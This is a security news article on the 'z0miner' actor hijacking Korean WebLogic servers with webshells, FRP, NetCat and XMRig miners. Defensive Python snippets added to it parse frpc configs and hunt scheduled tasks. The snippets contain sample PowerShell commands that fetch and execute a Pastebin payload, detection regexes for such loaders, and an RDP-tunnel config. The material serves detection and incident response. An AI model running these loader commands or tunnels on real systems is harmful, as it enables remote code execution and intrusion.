Hackers Hijacking Web Server To Deploy z0Miner Malware


The threat actor, who goes by the name “z0miner,” has been found attacking Korean WebLogic servers to distribute malware such as miners, network tools, and scripts for further attacks.

This threat actor has a history of attacking vulnerable servers such as Atlassian Confluence, Apache ActiveMQ, Log4j, and many more.

Researchers at Tencent first discovered this threat actor in 2020. The “z0miner” threat actor is well-known for exploiting CVE-2020-14882 and CVE-2020-14883 against Oracle WebLogic servers.

However, according to ASEC researchers, their latest targets were Korean WebLogic servers, and several traces of tools such as FRP (Fast Reverse Proxy), NetCat, and AnyDesk were present.


Technical Analysis

According to reports shared with Cyber Security News, the threat actor exploited these Korean WebLogic servers due to poor security configuration and the widespread exposure of server information. 

The threat actor was able to discover the Tomcat version and the server version of these servers.

Once this information was gathered, the threat actor used several tools, such as a webshell, FRP, and NetCat, to exploit the servers further.

Exploited servers (Source: AhnLab)

Exploitation Methods

WebShell

The threat actor utilized the WebLogic vulnerability CVE-2020-14882 to upload a JSP webshell on the vulnerable system, enabling persistence and control over the system.

Three webshells, JSP file Browser, Shack2, and Behinder, were deployed. Moreover, none of these webshells were detected by anti-malware products.

Webshell (Source: AhnLab)

Fast Reverse Proxy (FRP)

This tool was used for RDP (Remote Desktop Protocol) communication. Both the default frpc and a customized version were used.

The default frpc loads a settings file in *.ini format and then attempts the connection, whereas the customized frpc can run without a separate configuration file.
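An added example, not from the article or AhnLab, of what a responder can pull out of a recovered frpc.ini: it parses the legacy INI layout the stock frpc reads and flags any TCP proxy that would expose the local RDP port through the attacker's frps server. The sample INI, server address and ports are constructed placeholders.

```python
import configparser

RDP_PORT = 3389

# Constructed frpc.ini in the legacy INI layout that the stock frpc reads. The
# server address and ports are placeholders, not indicators taken from the article.
SAMPLE_FRPC_INI = """
[common]
server_addr = 203.0.113.10
server_port = 7000

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 6000

[web]
type = http
local_port = 8080
custom_domains = placeholder.example
"""


def parse_frpc(ini_text):
    """Return the frps endpoint and one dict per proxy section of an frpc.ini."""
    cp = configparser.ConfigParser()
    cp.read_string(ini_text)
    endpoint = "%s:%s" % (cp.get("common", "server_addr", fallback="?"),
                          cp.get("common", "server_port", fallback="?"))
    proxies = []
    for name in cp.sections():
        if name == "common":
            continue
        sec = cp[name]
        proxies.append({
            "name": name,
            "type": sec.get("type", "tcp"),
            "local_port": sec.getint("local_port", fallback=0),
            "remote_port": sec.getint("remote_port", fallback=0),
        })
    return endpoint, proxies


def rdp_tunnels(ini_text):
    """Proxies that would expose the local RDP port through the attacker's frps."""
    _, proxies = parse_frpc(ini_text)
    return [p for p in proxies if p["type"] == "tcp" and p["local_port"] == RDP_PORT]


if __name__ == "__main__":
    endpoint, proxies = parse_frpc(SAMPLE_FRPC_INI)
    print("frps endpoint:", endpoint)
    for p in rdp_tunnels(SAMPLE_FRPC_INI):
        print("RDP exposed via", p["name"], "-> remote port", p["remote_port"])
```

The frps endpoint printed here is the address to look for in outbound connection logs from the compromised host.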

FRP Download (Source: AhnLab)

NetCat

Netcat can read and write data over a network connection and has been found in many webshells.

It provides a remote shell feature, which lets the attacker bypass the firewall and gain control of the targeted system.

Netcat implemented as “userinit.exe” (Source: AhnLab)

Miner (XMRig)

The versions of XMRig used by z0miner are different for Windows and Linux. XMRig 6.18.0 was used in Windows, and 6.18.1 was used for Linux.

To establish persistence for the miner, the threat actor used Task Scheduler (schtasks) or a WMI event filter, configured to read a PowerShell script from a specific Pastebin address and execute it.
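An added hunting example, not from the article or AhnLab, for the persistence pattern just described: it parses Task Scheduler XML exports (the format `schtasks /query /xml` produces) and flags any action, or any WMI CommandLineEventConsumer command-line template, that launches PowerShell to fetch a raw Pastebin paste and run it. The task exports, the WMI template and the paste id are constructed samples.

```python
import re
import xml.etree.ElementTree as ET
# Namespace used by every Task Scheduler XML export (schtasks /query /xml).
NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Indicators mirroring the behaviour described above: PowerShell started by a
# scheduled task or WMI consumer that fetches a raw Pastebin paste and runs it.
PATTERNS = {
    "powershell": re.compile(r"\b(powershell(\.exe)?|pwsh)\b", re.I),
    "pastebin": re.compile(r"pastebin\.com/raw/", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I),
    "invoke": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
}

def classify(cmdline):
    """Names of the indicators a command line matches."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]

def is_pastebin_loader(cmdline):
    """True for PowerShell that pulls a Pastebin raw paste and downloads or executes it.
    Works on a task's command line or on a WMI CommandLineEventConsumer's CommandLineTemplate."""
    hits = classify(cmdline)
    return "powershell" in hits and "pastebin" in hits and ("download" in hits or "invoke" in hits)

def task_actions(task_xml):
    """'command arguments' strings for each <Exec> action in a task XML export."""
    root = ET.fromstring(task_xml)
    actions = []
    for ex in root.iter(NS + "Exec"):
        cmd = (ex.findtext(NS + "Command") or "").strip()
        args = (ex.findtext(NS + "Arguments") or "").strip()
        actions.append((cmd + " " + args).strip())
    return actions

def suspicious_actions(task_xml):
    """Only the actions of a task that match the Pastebin-loader pattern."""
    return [a for a in task_actions(task_xml) if is_pastebin_loader(a)]

# Constructed samples (not from the article): one malicious task export, one benign
# one, and a WMI CommandLineTemplate string. The paste id is a placeholder.
MALICIOUS_TASK = (
    '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Actions><Exec>'
    '<Command>powershell.exe</Command><Arguments>-w hidden -c "IEX (New-Object Net.WebClient)'
    ".DownloadString('https://pastebin.com/raw/PLACEHOLDER')\"</Arguments></Exec></Actions></Task>"
)
BENIGN_TASK = (
    '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><Actions><Exec>'
    '<Command>%windir%\\system32\\sc.exe</Command><Arguments>start w32time</Arguments></Exec></Actions></Task>'
)
WMI_TEMPLATE = 'powershell -ep bypass -c "iwr https://pastebin.com/raw/PLACEHOLDER | iex"'
```

On a live host the same checks apply to the output of `Get-ScheduledTask | Export-ScheduledTask` and to the CommandLineTemplate property of consumers in the root\subscription WMI namespace.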

XMRig (Source: AhnLab)

The threat actor also configured a Monero wallet and mining pool address for the miner.

AnyDesk was also among the tools the threat actor deployed through the webshell, but only in cases where the Apache ActiveMQ vulnerability (CVE-2023-46604) was exploited.

Indicators Of Compromise


C&C URL

(Korean web servers exploited and used as download servers are shown only on TIP.)

